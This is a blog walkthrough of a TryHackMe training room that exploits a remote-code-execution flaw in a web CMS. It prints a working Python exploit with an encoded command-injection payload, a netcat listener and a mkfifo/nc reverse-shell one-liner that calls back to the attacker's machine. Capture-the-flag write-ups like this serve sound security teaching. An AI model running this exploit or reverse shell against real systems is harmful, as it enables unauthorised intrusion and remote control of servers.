Walkthrough for the Vulnerability Capstone Room

The Vulnerability Capstone Room is the final room in a series of three room created by https://tryhackme.com/p/cmnatic to teach people about vulnerabilities in software.

The room is available at https://tryhackme.com/room/vulnerabilitycapstone

Start the machine and wait the required 3 minutes so that it is up and running.

Question 1 – What is the name of the application running on the vulnerable machine?

Question 1 Answer – Browse to the machine and the answer is on the front page

Question 2 – What is the version number of this application?

Question 2 Answer – Browse to the machine and the answer is on the front page

Question 3 – What is the number of the CVE that allows an attacker to remotely execute code on this application?

Question 3 Answer – Browse to https://www.exploit-db.com/ and search for the name and version of the application running. A hint is that it is CVE-2018-XXXXX

The exploit code is available from searchsploit on your local machine or on https://www.exploit-db.com but it needs to be modified to work correctly. As the original code expects Burp to be running as a proxy. You use the modified code below, just remember to change x.x.x.x to the room’s correct IP address:

import requests
import urllib

URL = "http://x.x.x.x/"


def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start


while 1:
    xxxx = input('cmd:')
    url = URL+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    r = requests.get(url)

    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)

    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)

    print(r.text[0:dup])

This will now give you a very limited shell. You can run any user commands you want, however, they will need to included in quotation marks like this

"whoami"

You can create a reverse listener to get a slightly more usable shell using netcat. First, open another terminal on your machine and the following command:

nc -nvlp 4444

This creates a netcat listener, waiting for a connection on port 4444. You are free to change 4444 to whatever port you prefer.

Now, on the Vulnerability Capstone machine, run the command:

"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 4444 >/tmp/f"

This will run a shell for netcat to connect your machine and the waiting netcat listener. For more information about this command, you visit the PentestMoney Reverse Cheat Sheet page at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Now you have a much better shell.

Now simply change to the /home/ubuntu folder and look for the flag.txt file.

From there you have the flag and the room in complete.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s